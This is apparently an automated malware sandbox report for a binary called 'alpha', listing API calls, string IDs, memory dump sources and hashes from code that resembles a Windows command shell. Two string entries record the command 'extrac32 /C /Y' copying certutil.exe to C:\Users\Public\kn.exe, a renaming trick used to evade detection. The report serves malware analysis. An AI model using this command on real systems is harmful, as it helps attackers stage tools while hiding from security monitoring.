                                                                                                                                                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F951
                                                                                                                                                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F96B
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151FA8E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D151FB14
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151FB2D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151FBEA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D151F996
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7D153849D,?,?,?,00007FF7D153F0C7), ref: 00007FF7D1520045
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7D153F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D1520071
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1520092
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7D15200A7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7D1520181
                                                                                                                                                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D152D401
                                                                                                                                                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D152D41B
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D152D435
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D152D480
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3964947564-518410914
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 858c05a286c9765b737b475739b4b371c87f0724d543fa198112305da3e5543d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42024726A1964B86FB54BF21E8501BCF6A1BF49B54FE54137E90F426B0DFBCA844C230
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 840959033-3627297882
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c7bbdf72d37530d9f0addba3914115681a45449b97e967dd01a61ce2ddc695b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99D17B22A0864BC6FB54BF21E8452BDB6A0AF54B44FD48077D90F862B6DFBCE4458770
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp$EnvironmentVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 198002717-267741548
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d74fdd8ff02203c14ba5d1bbfd467f09d23cc99dc5c621ccfdda34cf655684ba
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7511D26B09A5B86F7506B51A81027DEB60FF49B80FD49177DA0F83675DFBCE0448760
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F000
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F031
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F0D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswdigitiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1595556998-2755026540
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1fa9ff3aa418b90ec13f43efebf1bfd85cbae4cc81189ebc0f0acdcb0df19bc0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40226C69E1965F81FB627B25A85027DF6A0BF05790FD24133D98F422B4DFBCE4898630
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: "$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3545743878-4143597401
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f276ca3c5535b167d93cc3c824f89fd5c9954775a59f7686bac0abe3b277b8c4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37C16166E0969BC1FB666B11940437DF6A1BF45B44FD68036EA4F023B4EFBCA485C630
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CurrentFormatMessageThread
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2411632146-3173542853
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: CreateFile_open_osfhandle
• String ID: con
• API String ID: 2905481843-4257191772
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
• String ID:
• API String ID: 3829876242-3916222277
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
• String ID: CSVFS$NTFS$REFS
• API String ID: 3510147486-2605508654
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,00000000,00000000,00007FF7D1517279,?,?,?,?,?,00007FF7D151BFA9), ref: 00007FF7D1534485
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: longjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1832741078-366822981
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 322c5cfc7085a76491137e66a5cd7dbef5c550a58f217e12f15cbc0909c32713
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3C17E60E0C64B81F725BB1A55856BCA791AB56B84FE14037DD0F536B2CFBCE8868360
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00007FF7D151BA2B
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT ref: 00007FF7D151BA8A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT ref: 00007FF7D151BAAA
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heapwcschr$AllocProcessmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2872855111-969133440
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 521aaf8e143ebafdc7f4e7ef76d3d33fafd5c86bf3ac3bf6b0cd795768a8e9e3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6CB17026A0D65B81FF61AB15A04427DB6A0FF48B84FD64236CA5F437B4DFBCA4818730
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1606811317-2340392073
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e98332cc88dc11f885a006c329dccb44d4478da8f554192ffc8d1dff321dcd87
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7D19C26A19A4B81F711AB24A8542BDB6A0BF45B90FD44233EA5F437B4DFBCE445C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$ErrorLast$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %04X-%04X$~
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2748242238-2468825380
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D1526677
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D152668F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _errno.MSVCRT ref: 00007FF7D15266A3
